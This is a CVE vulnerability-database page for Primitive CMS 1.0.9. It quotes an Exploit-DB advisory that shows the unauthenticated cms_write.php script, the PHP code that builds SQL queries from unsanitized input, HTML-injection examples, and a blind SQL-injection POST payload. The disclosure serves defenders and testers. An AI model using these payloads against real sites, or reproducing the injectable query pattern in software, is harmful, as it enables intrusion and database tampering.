CVE-2010-3483
Description
cms_write.php in Primitive CMS 1.0.9 does not properly restrict access, which allows remote attackers to gain administrative privileges via a direct request. NOTE: this vulnerability can be leveraged to conduct cross-site scripting attacks, as demonstrated using the (1) title, (2) content, and (3) menutitle parameters.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
primitive CMS 1.0.9 - Multiple Vulnerabilities
# Exploit Title: Primitive CMS 1.0.9 Multiple Vulnerabilities
# Date: 20.09.2010
# Author: Stephan Sattler // Solidmedia.de
# Software Website: http://www.bouzouste.info/
# Software Link: http://www.bouzouste.info/link/click.php?id=1
# Version: 1.0.9
[Vulnerability 1]
# Unauthorized Access
Url: http://[site]/[cmspath]/cms_write.php
In cms_write.php is no check if the user has administration rights.
Because of that, there are 2 more vulnerabilities.
[Vulnerability 2]
# Html Injection
Url: http://[site]/[cmspath]/cms_write.php
Vulnerable Code (cms_write.php line 13-25):
$title=$_POST[title];
$content=$_POST[content];
$menutitle=$_POST[menutitle];
$sql="INSERT INTO `prim_page` ( `id` , `title` , `content`, `menutitle` ) VALUES ('', '$title', '$content', '$menutitle')";
mysql_query($sql);
The title, Menu-title and Content a user can submit are inserted directly into
the database and inserted in the html-code on the page without
and sanitizing at all.
Example for the Title: </title><h1>Testtitle</h1>
Example for the Menu-Title: </a><h2>Menutitle</h2>
[Vulnerability 3]
# Blind SQL-Injection // PoC
Url: http://[site]/[cmspath]/cms_write.php
Vulnerable Code (cms_write.php line 13-16):
$title=$_POST[title];
$menutitle=$_POST[menutitle];
$sqlcheck="SELECT * FROM prim_page WHERE title='$title' or menutitle='$menutitle' ";
Postdata for Injection: title=&menutitle=home' AND (SELECT 1)='1&content=&submit=OK
One can inject via title or menutitle, both are vulnerable. On success, you'll see the message: "H selida yparxei"Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| bouzouste | primitive_cms | 1.0.9 | |
References
- http://packetstormsecurity.org/1009-exploits/primitive-sqlxss.txt
- http://secunia.com/advisories/41515
- http://www.exploit-db.com/exploits/15064
- http://www.vupen.com/english/advisories/2010/2458
- http://packetstormsecurity.org/1009-exploits/primitive-sqlxss.txt
- http://secunia.com/advisories/41515
- http://www.exploit-db.com/exploits/15064
- http://www.vupen.com/english/advisories/2010/2458
CWEs
CWE-264
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.